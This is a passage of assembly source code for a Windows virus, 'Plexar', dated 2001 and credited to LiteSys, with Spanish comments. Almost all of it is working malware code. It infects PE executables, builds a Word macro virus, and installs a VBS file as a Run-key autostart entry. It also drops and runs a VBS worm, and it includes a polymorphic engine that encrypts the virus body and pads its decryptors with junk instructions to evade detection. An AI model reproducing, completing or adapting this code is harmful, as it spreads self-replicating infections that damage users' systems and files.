POPAD
|
||
RET
|
||
|
||
@Fin_DPE:
|
||
|
||
POPAD
|
||
STC
|
||
RET
|
||
|
||
Droppear_PE ENDP
|
||
|
||
DB 00h, 00h
|
||
DB "< Virus Plexar (c) Julio/Agosto 2001 - Escrito por LiteSys >"
|
||
DB 00h, 00h
|
||
DB "[ Hecho en Venezuela ]"
|
||
DB 00h, 00h
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para soltar el virus macro de Word.
|
||
|
||
Infecta_Word PROC Pascal DeltaOfs:DWORD
|
||
|
||
PUSHAD
|
||
|
||
MOV EBP, DeltaOfs
|
||
|
||
CALL @SEH_3
|
||
|
||
MOV ESP, DWORD PTR [ESP+8h]
|
||
JMP @IW_Fin
|
||
|
||
@SEH_3:
|
||
|
||
XOR EAX, EAX
|
||
PUSH DWORD PTR FS:[EAX]
|
||
MOV FS:[EAX], ESP
|
||
|
||
PUSH PAGE_READWRITE
|
||
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
||
PUSH MAX_PATH
|
||
PUSH NULL
|
||
APICALL VirtualAlloc
|
||
MOV DWO [VFreeZ], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
PUSH MAX_PATH
|
||
PUSH EAX
|
||
APICALL GetWindowsDirectoryA
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
PUSH DWO [VFreeZ]
|
||
APICALL SetCurrentDirectoryA
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
PUSH MEM_DECOMMIT
|
||
PUSH MAX_PATH
|
||
PUSH 12345678h
|
||
ORG $-4
|
||
VFreeZ DD 00000000h
|
||
APICALL VirtualFree
|
||
|
||
LEA EBX, OFS [WScript_Exe]
|
||
CALL @Existe_Archivo
|
||
JNC @VBS_Fin
|
||
|
||
LEA EBX, OFS [Raxelp_$$$]
|
||
CALL @Existe_Archivo
|
||
JC @IW_Fin
|
||
|
||
LEA EDI, OFS [Macaco]
|
||
PUSH 08h
|
||
POP ECX
|
||
@IW2:
|
||
PUSH 25d
|
||
POP EBX
|
||
CALL Random
|
||
ADD EAX, 65d
|
||
STOSB
|
||
LOOP @IW2
|
||
|
||
MOV EAX, "$$$."
|
||
STOSD
|
||
XOR AL, AL
|
||
STOSB
|
||
|
||
LEA EBX, OFS [Macaco]
|
||
CALL Droppear_PE
|
||
JC @IW_Fin
|
||
|
||
LEA EBX, OFS [Macaco]
|
||
CALL Infecta_PE
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH OPEN_EXISTING
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_READ + GENERIC_WRITE
|
||
LEA EAX, OFS [Macaco]
|
||
PUSH EAX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle_IW], EAX
|
||
INC EAX
|
||
JZ @IW_Fin
|
||
DEC EAX
|
||
|
||
PUSH NULL
|
||
PUSH EAX
|
||
APICALL GetFileSize
|
||
MOV DWO [Tama¤o_IW], EAX
|
||
INC EAX
|
||
JZ @IW_CierraFile
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH PAGE_READWRITE
|
||
PUSH EAX
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL CreateFileMappingA
|
||
MOV DWO [MHandle], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_CierraFile
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
||
PUSH EAX
|
||
APICALL MapViewOfFile
|
||
MOV DWO [BaseMap_IW], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_CierraMap
|
||
|
||
PUSH PAGE_READWRITE
|
||
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
||
MOV EAX, DWO [Tama¤o_IW]
|
||
ADD EAX, EAX
|
||
ADD EAX, 1000h
|
||
PUSH EAX
|
||
PUSH NULL
|
||
APICALL VirtualAlloc
|
||
MOV DWO [Memoria_IW], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
MOV ECX, DWO [Tama¤o_IW]
|
||
MOV EDI, EAX
|
||
MOV ESI, DWO [BaseMap_IW]
|
||
|
||
@Conve:
|
||
|
||
LODSB
|
||
CALL @Hexa
|
||
STOSW
|
||
|
||
LOOP @Conve
|
||
|
||
XOR EAX, EAX
|
||
STOSD
|
||
|
||
PUSH DWO [BaseMap_IW]
|
||
APICALL UnmapViewOfFile
|
||
|
||
PUSH DWO [MHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH CREATE_NEW
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_READ + GENERIC_WRITE
|
||
LEA EAX, OFS [Raxelp_$$$]
|
||
PUSH EAX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle_IW], EAX
|
||
INC EAX
|
||
JZ @IW_Fin
|
||
|
||
DEC EAX
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH 131072d
|
||
PUSH EBX
|
||
PUSH PAGE_READWRITE
|
||
PUSH EBX
|
||
PUSH EAX
|
||
APICALL CreateFileMappingA
|
||
MOV DWO [MHandle_IW], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_CierraFile
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
||
PUSH EAX
|
||
APICALL MapViewOfFile
|
||
MOV DWO [BaseMap_IW], EAX
|
||
OR EAX, EAX
|
||
JZ @IW_CierraMap
|
||
|
||
MOV EDI, EAX
|
||
LEA ESI, OFS [Virus_Macro]
|
||
PUSH L_Virus_Macro
|
||
POP ECX
|
||
REP MOVSB
|
||
|
||
MOV ESI, DWO [Memoria_IW]
|
||
XOR EDX, EDX
|
||
XOR EAX, EAX
|
||
|
||
@IW_B:
|
||
|
||
MOVSB
|
||
INC EDX
|
||
CMP EDX, 200d
|
||
JNZ @IW_D
|
||
|
||
MOV AL, '"'
|
||
STOSB
|
||
MOV AX, 0A0Dh
|
||
STOSW
|
||
MOV EAX, "adoj"
|
||
STOSD
|
||
MOV EAX, 'j = '
|
||
STOSD
|
||
MOV EAX, " ado"
|
||
STOSD
|
||
MOV AX, " +"
|
||
STOSW
|
||
MOV AL, '"'
|
||
STOSB
|
||
|
||
; joda = joda + "
|
||
|
||
XOR EAX, EAX
|
||
XOR EDX, EDX
|
||
|
||
@IW_D:
|
||
|
||
CMP BYTE PTR [ESI], AL
|
||
JNZ @IW_B
|
||
|
||
MOV AL, '"'
|
||
STOSB
|
||
MOV AX, 0A0Dh
|
||
STOSW
|
||
|
||
LEA ESI, OFS [Virus_Macro_2]
|
||
PUSH L_Virus_Macro_2
|
||
POP ECX
|
||
REP MOVSB
|
||
|
||
PUSH DWO [BaseMap_IW]
|
||
APICALL UnmapViewOfFile
|
||
|
||
PUSH DWO [MHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
SUB EDI, DWO [BaseMap_IW]
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EDI
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL SetFilePointer
|
||
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL SetEndOfFile
|
||
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
PUSH MEM_DECOMMIT
|
||
MOV EAX, DWO [Tama¤o_IW]
|
||
ADD EAX, EAX
|
||
ADD EAX, 1000h
|
||
PUSH EAX
|
||
PUSH DWO [Memoria_IW]
|
||
APICALL VirtualFree
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH CREATE_ALWAYS
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_WRITE
|
||
LEA EBX, OFS [Plxwrd_vbs]
|
||
PUSH EBX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle], EAX
|
||
INC EAX
|
||
JZ @IW_Fin
|
||
DEC EAX
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
LEA EDX, OFS [Scriptum]
|
||
PUSH EDX
|
||
PUSH Largo_MVBS
|
||
LEA EDX, OFS [Macro_VBS]
|
||
PUSH EDX
|
||
PUSH EAX
|
||
APICALL WriteFile
|
||
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
CALL @IW_Q
|
||
DB "SHLWAPI.DLL", 00h
|
||
@IW_Q: APICALL LoadLibraryA
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
CALL @IW_K
|
||
DB "SHSetValueA", 00h
|
||
@IW_K: PUSH EAX
|
||
APICALL GetProcAddress
|
||
OR EAX, EAX
|
||
JZ @IW_Fin
|
||
|
||
PUSH 11d
|
||
LEA EBX, OFS [Plxwrd_vbs]
|
||
PUSH EBX
|
||
PUSH REG_SZ
|
||
CALL @IW_L
|
||
DB "Plexar", 00h
|
||
@IW_L: CALL @IW_M
|
||
DB "Software\Microsoft\Windows\CurrentVersion\Run", 00h
|
||
@IW_M: PUSH HKEY_LOCAL_MACHINE
|
||
CALL EAX
|
||
|
||
@IW_Fin:
|
||
|
||
XOR ECX, ECX
|
||
POP DWORD PTR FS:[ECX]
|
||
POP ECX
|
||
|
||
IF DEBUG
|
||
|
||
POPAD
|
||
RET
|
||
|
||
ELSE
|
||
|
||
MOV DWO [GuardaEBP2], EBP
|
||
POPAD
|
||
|
||
MOV EBX, 12345678h
|
||
ORG $-4
|
||
GuardaEBP2 DD 00000000h
|
||
|
||
PUSH NULL
|
||
CALL [EBX+ExitThread]
|
||
|
||
RET
|
||
|
||
ENDIF
|
||
|
||
@IW_CierraMap:
|
||
|
||
PUSH DWO [MHandle_IW]
|
||
APICALL CloseHandle
|
||
|
||
@IW_CierraFile:
|
||
|
||
PUSH DWO [FHandle_IW]
|
||
APICALL CloseHandle
|
||
JMP @IW_Fin
|
||
|
||
; Convierte un numero a su representacion ASCII en Hex.
|
||
|
||
@Hexa:
|
||
|
||
PUSH ECX
|
||
PUSH EDI
|
||
|
||
XOR ECX, ECX
|
||
MOV CL, AL
|
||
PUSH ECX
|
||
SHR CL, 04h
|
||
LEA EDI, OFS [Tabla_Hex]
|
||
INC CL
|
||
|
||
@@Y:
|
||
INC EDI
|
||
DEC CL
|
||
JNZ @@Y
|
||
|
||
DEC EDI
|
||
MOV AL, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla
|
||
POP ECX
|
||
AND CL, 0Fh
|
||
LEA EDI, OFS [Tabla_Hex]
|
||
INC CL
|
||
|
||
@@X:
|
||
INC EDI
|
||
DEC CL
|
||
JNZ @@X
|
||
|
||
DEC EDI
|
||
MOV AH, BYTE PTR [EDI] ; Pasa el numero exacto de la tabla
|
||
POP EDI
|
||
POP ECX
|
||
|
||
RET 00h
|
||
|
||
Infecta_Word ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
Worm_VBS PROC Pascal DeltaOfs:DWORD
|
||
|
||
PUSHAD
|
||
|
||
MOV EBP, DeltaOfs
|
||
|
||
CALL @SEH_4
|
||
|
||
MOV ESP, DWORD PTR [ESP+8h]
|
||
JMP @VBS_Fin
|
||
|
||
@SEH_4:
|
||
|
||
XOR EAX, EAX
|
||
PUSH DWORD PTR FS:[EAX]
|
||
MOV FS:[EAX], ESP
|
||
|
||
PUSH PAGE_READWRITE
|
||
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
||
PUSH MAX_PATH
|
||
PUSH NULL
|
||
APICALL VirtualAlloc
|
||
MOV DWO [VFreeX], EAX
|
||
OR EAX, EAX
|
||
JZ @VBS_Fin
|
||
|
||
PUSH MAX_PATH
|
||
PUSH EAX
|
||
APICALL GetWindowsDirectoryA
|
||
OR EAX, EAX
|
||
JZ @VBS_Fin
|
||
|
||
PUSH DWO [VFreeX]
|
||
APICALL SetCurrentDirectoryA
|
||
OR EAX, EAX
|
||
JZ @VBS_Fin
|
||
|
||
PUSH MEM_DECOMMIT
|
||
PUSH MAX_PATH
|
||
PUSH 12345678h
|
||
ORG $-4
|
||
VFreeX DD 00000000h
|
||
APICALL VirtualFree
|
||
|
||
LEA EBX, OFS [WScript_Exe]
|
||
CALL @Existe_Archivo
|
||
JNC @VBS_Fin
|
||
|
||
LEA EBX, OFS [Raxelp_vbs]
|
||
CALL @Existe_Archivo
|
||
JC @VBS_Fin
|
||
|
||
PUSH 10d
|
||
POP EBX
|
||
CALL Random
|
||
XCHG ECX, EAX
|
||
LEA EDI, OFS [Nombres_Varios]
|
||
INC ECX
|
||
@VBS1:
|
||
XOR AL, AL
|
||
SCASB
|
||
JNZ @VBS1
|
||
LOOP @VBS1
|
||
|
||
PUSH EDI
|
||
@VBS2:
|
||
XOR AL, AL
|
||
INC ECX
|
||
SCASB
|
||
JNZ @VBS2
|
||
DEC ECX
|
||
POP EDI
|
||
|
||
MOV BY [LargoVBS], CL
|
||
MOV DWO [GuardaNom], EDI
|
||
|
||
MOV EBX, EDI
|
||
CALL Droppear_PE
|
||
JC @VBS_Fin
|
||
|
||
MOV EBX, DWO [GuardaNom]
|
||
CALL Infecta_PE
|
||
|
||
XOR EAX, EAX
|
||
PUSH EAX
|
||
PUSH FILE_ATTRIBUTE_NORMAL
|
||
PUSH CREATE_NEW
|
||
PUSH EAX
|
||
PUSH EAX
|
||
PUSH GENERIC_READ + GENERIC_WRITE
|
||
LEA EAX, OFS [Raxelp_vbs]
|
||
PUSH EAX
|
||
APICALL CreateFileA
|
||
MOV DWO [FHandle_WVBS], EAX
|
||
INC EAX
|
||
JZ @VBS_Fin
|
||
DEC EAX
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH 4096d
|
||
PUSH EBX
|
||
PUSH PAGE_READWRITE
|
||
PUSH EBX
|
||
PUSH EAX
|
||
APICALL CreateFileMappingA
|
||
MOV DWO [MHandle_WVBS], EAX
|
||
OR EAX, EAX
|
||
JZ @VBS_CierraFile
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH FILE_MAP_READ + FILE_MAP_WRITE
|
||
PUSH EAX
|
||
APICALL MapViewOfFile
|
||
MOV DWO [BaseMap_WVBS], EAX
|
||
OR EAX, EAX
|
||
JZ @VBS_DesMapea
|
||
|
||
XCHG EDI, EAX
|
||
LEA ESI, OFS [Gusano_VBS]
|
||
PUSH L_Gusano_VBS
|
||
POP ECX
|
||
REP MOVSB
|
||
|
||
PUSH EDI
|
||
PUSH MAX_PATH
|
||
PUSH EDI
|
||
APICALL GetWindowsDirectoryA
|
||
OR EAX, EAX
|
||
JZ @VBS_CierraTodo
|
||
POP EDI
|
||
ADD EDI, EAX
|
||
MOV BYTE PTR [EDI], "\"
|
||
INC EDI
|
||
|
||
MOV ESI, DWO [GuardaNom]
|
||
MOVZX ECX, BY [LargoVBS]
|
||
REP MOVSB
|
||
|
||
LEA ESI, OFS [Gusano_VBS2]
|
||
PUSH L_Gusano_VBS2
|
||
POP ECX
|
||
REP MOVSB
|
||
SUB EDI, DWO [BaseMap_WVBS]
|
||
|
||
PUSH DWO [BaseMap_WVBS]
|
||
APICALL UnmapViewOfFile
|
||
|
||
PUSH DWO [MHandle_WVBS]
|
||
APICALL CloseHandle
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EDI
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL SetFilePointer
|
||
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL SetEndOfFile
|
||
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL CloseHandle
|
||
|
||
CALL @VBS3
|
||
DB "SHELL32.DLL", 00h
|
||
@VBS3: APICALL LoadLibraryA
|
||
OR EAX, EAX
|
||
JZ @VBS_Fin
|
||
|
||
CALL @VBS4
|
||
DB "ShellExecuteA", 00h, 5 DUP (90h)
|
||
@VBS4: PUSH EAX
|
||
APICALL GetProcAddress
|
||
OR EAX, EAX
|
||
JZ @VBS_Fin
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
LEA EDX, OFS [Raxelp_VBS]
|
||
PUSH EDX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
CALL EAX
|
||
|
||
@VBS_Fin:
|
||
|
||
XOR ECX, ECX
|
||
POP DWORD PTR FS:[ECX]
|
||
POP ECX
|
||
|
||
IF DEBUG
|
||
|
||
POPAD
|
||
RET
|
||
|
||
ELSE
|
||
|
||
MOV DWO [GuardaEBP3], EBP
|
||
POPAD
|
||
|
||
MOV EBX, 12345678h
|
||
ORG $-4
|
||
GuardaEBP3 DD 00000000h
|
||
|
||
PUSH NULL
|
||
CALL [EBX+ExitThread]
|
||
RET
|
||
|
||
ENDIF
|
||
|
||
@VBS_CierraTodo:
|
||
|
||
PUSH DWO [BaseMap_WVBS]
|
||
APICALL UnmapViewOfFile
|
||
|
||
@VBS_DesMapea:
|
||
|
||
PUSH DWO [MHandle_WVBS]
|
||
APICALL CloseHandle
|
||
|
||
@VBS_CierraFile:
|
||
|
||
XOR EBX, EBX
|
||
PUSH EBX
|
||
PUSH EBX
|
||
PUSH DWO [Scriptum]
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL SetFilePointer
|
||
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL SetEndOfFile
|
||
|
||
PUSH DWO [FHandle_WVBS]
|
||
APICALL CloseHandle
|
||
|
||
JMP @VBS_Fin
|
||
|
||
; Rutina para revisar la existencia de un archivo.
|
||
; EBX -> Nombre de archivo.
|
||
; Retorna acarreo si existe
|
||
|
||
@Existe_Archivo:
|
||
|
||
PUSH EBX
|
||
PUSH PAGE_READWRITE
|
||
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
|
||
PUSH SIZEOF_WIN32_FIND_DATA
|
||
PUSH NULL
|
||
APICALL VirtualAlloc
|
||
MOV DWO [VAllocZ], EAX
|
||
OR EAX, EAX
|
||
JZ @EA_Negativo
|
||
POP EBX
|
||
|
||
PUSH EAX
|
||
PUSH EBX
|
||
APICALL FindFirstFileA
|
||
INC EAX
|
||
JZ @EA_Negativo
|
||
|
||
DEC EAX
|
||
PUSH EAX
|
||
APICALL FindClose
|
||
|
||
PUSH MEM_DECOMMIT
|
||
PUSH SIZEOF_WIN32_FIND_DATA
|
||
PUSH 12345678h
|
||
ORG $-4
|
||
VAllocZ DD 00000000h
|
||
APICALL VirtualFree
|
||
|
||
STC
|
||
RET 0
|
||
|
||
@EA_Negativo:
|
||
|
||
PUSH MEM_DECOMMIT
|
||
PUSH SIZEOF_WIN32_FIND_DATA
|
||
PUSH DWO [VAllocZ]
|
||
APICALL VirtualFree
|
||
|
||
CLC
|
||
RET 0
|
||
|
||
|
||
Worm_VBS ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
DB "[" XOR 40h
|
||
DB "D" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "s" XOR 40h
|
||
DB "i" XOR 40h
|
||
DB "g" XOR 40h
|
||
DB "n" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "d" XOR 40h
|
||
DB " " XOR 40h
|
||
DB "b" XOR 40h
|
||
DB "y" XOR 40h
|
||
DB " " XOR 40h
|
||
DB "L" XOR 40h
|
||
DB "i" XOR 40h
|
||
DB "t" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "S" XOR 40h
|
||
DB "y" XOR 40h
|
||
DB "s" XOR 40h
|
||
DB "]" XOR 40h
|
||
DB 40h
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; PXPE: Plexar Polymorphic Engine: Another Lame Poly Written By Me.
|
||
;
|
||
; ESI -> Origen
|
||
; EDI -> Destino
|
||
; ECX -> Tama¤o
|
||
|
||
PXPE PROC
|
||
|
||
MOV DWO [Origen], ESI
|
||
MOV DWO [Destino], EDI
|
||
MOV DWO [Tama¤o], ECX
|
||
|
||
CALL @Inicializar_Semillas
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
MOV DWO [Llave], EAX
|
||
|
||
MOV EDI, DWO [Destino]
|
||
|
||
; DELTA
|
||
|
||
PUSH EDI
|
||
CALL @Basura
|
||
CALL @Basura
|
||
POP EDX
|
||
SUB EDX, EDI
|
||
MOV DWO [GuardaDelta2], EDX
|
||
|
||
MOV AL, 0E8h ; CALL
|
||
STOSB
|
||
XOR EAX, EAX ; Delta
|
||
STOSD
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @Popear_Delta
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @Meter_Tama¤o
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
CALL @Colocar_Lea
|
||
CALL @Basura
|
||
MOV DWO [GuardaLoop], EDI
|
||
CALL @Basura
|
||
|
||
MOV AX, 03781h ; XOR DWORD PTR [EDI]
|
||
STOSW
|
||
MOV EAX, DWO [Llave]
|
||
STOSD
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @SumaCuatro
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
MOV AL, 049h
|
||
STOSB
|
||
MOV AX, 850Fh
|
||
STOSW
|
||
MOV EAX, DWO [GuardaLoop]
|
||
SUB EAX, EDI
|
||
SUB EAX, 04h
|
||
STOSD
|
||
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
MOV EAX, EDI
|
||
SUB EAX, DWO [Destino]
|
||
SUB EAX, 05h
|
||
MOV EBX, DWO [GuardaDelta]
|
||
SUB DWORD PTR [EBX], EAX
|
||
MOV EDX, DWO [GuardaDelta2]
|
||
SUB DWORD PTR [EBX], EDX
|
||
|
||
MOV ESI, DWO [Origen]
|
||
MOV ECX, DWO [Tama¤o]
|
||
MOV EAX, DWO [Llave]
|
||
|
||
@ReCopia:
|
||
MOVSD
|
||
XOR DWORD PTR [EDI-4h], EAX
|
||
LOOP @ReCopia
|
||
|
||
RET
|
||
|
||
@Inicializar_Semillas:
|
||
|
||
LEA EDI, OFS [@SaveSemilla]
|
||
RDTSC
|
||
STOSD
|
||
PUSH 04h
|
||
POP EDI
|
||
LEA ESI, OFS [@SaveSemilla]
|
||
CALL CRC32
|
||
MOV DWO [Semilla_1], EAX
|
||
|
||
APICALL GetTickCount
|
||
ADD EAX, EAX
|
||
NOT EAX ; que mierda...
|
||
PUSH 04h
|
||
POP EDI
|
||
LEA ESI, OFS [@SaveSemilla]
|
||
CALL CRC32
|
||
MOV DWO [Semilla_2], EAX
|
||
|
||
RET
|
||
|
||
; Un indecente generador de numeros aleatorios...
|
||
;
|
||
; EBX -> Limite.
|
||
|
||
@Aleatorio:
|
||
|
||
PUSH EDI
|
||
PUSH ECX
|
||
PUSH EDX
|
||
PUSH EBX
|
||
|
||
MOV EAX, DWO [Semilla_1]
|
||
IMUL EAX, Mierda_1
|
||
ADD EAX, Mierda_2
|
||
MOV DWO [Semilla_1], EAX
|
||
|
||
LEA EDI, OFS [Milonga]
|
||
STOSD
|
||
|
||
MOV EBX, DWO [Semilla_2]
|
||
IMUL EBX, Mierda_3
|
||
ADD EBX, Mierda_4
|
||
MOV DWO [Semilla_2], EBX
|
||
XCHG EAX, EBX
|
||
STOSD
|
||
|
||
LEA ESI, OFS [Milonga]
|
||
PUSH 08h
|
||
POP EDI
|
||
CALL CRC32
|
||
|
||
POP EBX
|
||
XOR EDX, EDX
|
||
DIV EBX
|
||
|
||
XCHG EDX, EAX
|
||
|
||
POP EDX
|
||
POP ECX
|
||
POP EDI
|
||
|
||
RET
|
||
|
||
Milonga DB 9 DUP (00h)
|
||
|
||
@Popear_Delta:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Popear_Delta_I
|
||
CMP EAX, 01h
|
||
JZ @Popear_Delta_II
|
||
CMP EAX, 02h
|
||
JZ @Popear_Delta_III
|
||
CMP EAX, 03h
|
||
JZ @Popear_Delta_IV
|
||
|
||
JMP @Popear_Delta_IV
|
||
|
||
@Popear_Delta_R:
|
||
|
||
RET
|
||
|
||
@Popear_Delta_I:
|
||
MOV AL, 05Dh ; POP EBP
|
||
STOSB
|
||
MOV AX, 0ED81h ; SUB EBP
|
||
STOSW
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_II:
|
||
MOV AL, 058h
|
||
STOSB
|
||
MOV AL, 02Dh
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 095h
|
||
STOSB
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_III:
|
||
MOV AL, 05Bh
|
||
STOSB
|
||
MOV AL, 0BAh
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AX, 0D329h
|
||
STOSW
|
||
MOV AX, 0DD87h
|
||
STOSW
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_IV:
|
||
MOV AL, 05Ah
|
||
STOSB
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 05Dh
|
||
STOSB
|
||
MOV AX, 0D587h
|
||
STOSW
|
||
MOV AX, 0D529h
|
||
STOSW
|
||
JMP @Popear_Delta_R
|
||
|
||
RET
|
||
|
||
@Meter_Tama¤o:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Meter_Tama¤o_I
|
||
CMP EAX, 01h
|
||
JZ @Meter_Tama¤o_II
|
||
CMP EAX, 02h
|
||
JZ @Meter_Tama¤o_III
|
||
CMP EAX, 03h
|
||
JZ @Meter_Tama¤o_IV
|
||
|
||
JMP @Meter_Tama¤o_III
|
||
|
||
@Meter_Tama¤oR:
|
||
|
||
RET
|
||
|
||
@Meter_Tama¤o_I:
|
||
MOV AL, 0B9h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
STOSD
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_II:
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
STOSD
|
||
MOV AL, 059h
|
||
STOSB
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_III:
|
||
MOV AL, 0BAh
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
NOT EAX
|
||
STOSD
|
||
MOV AX, 0CA87h
|
||
STOSW
|
||
MOV AX, 0D1F7h
|
||
STOSW
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Meter_Tama¤o_IV:
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
XCHG EDX, EAX
|
||
|
||
MOV AL, 068h
|
||
STOSB
|
||
MOV EAX, EDX
|
||
STOSD
|
||
MOV AL, 058h
|
||
STOSB
|
||
MOV AL, 035h
|
||
STOSB
|
||
MOV EAX, DWO [Tama¤o]
|
||
XOR EAX, EDX
|
||
STOSD
|
||
MOV AL, 091h
|
||
STOSB
|
||
JMP @Meter_Tama¤oR
|
||
|
||
@Colocar_LEA:
|
||
|
||
PUSH 03h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Colocar_Lea_I
|
||
CMP EAX, 01h
|
||
JZ @Colocar_Lea_II
|
||
CMP EAX, 02h
|
||
JZ @Colocar_Lea_III
|
||
|
||
JMP @Colocar_Lea_II
|
||
|
||
@Colocar_LEAR:
|
||
|
||
RET
|
||
|
||
@Colocar_LEA_I:
|
||
MOV AX, 0BD8Dh
|
||
STOSW
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
JMP @Colocar_LEAR
|
||
|
||
@Colocar_LEA_II:
|
||
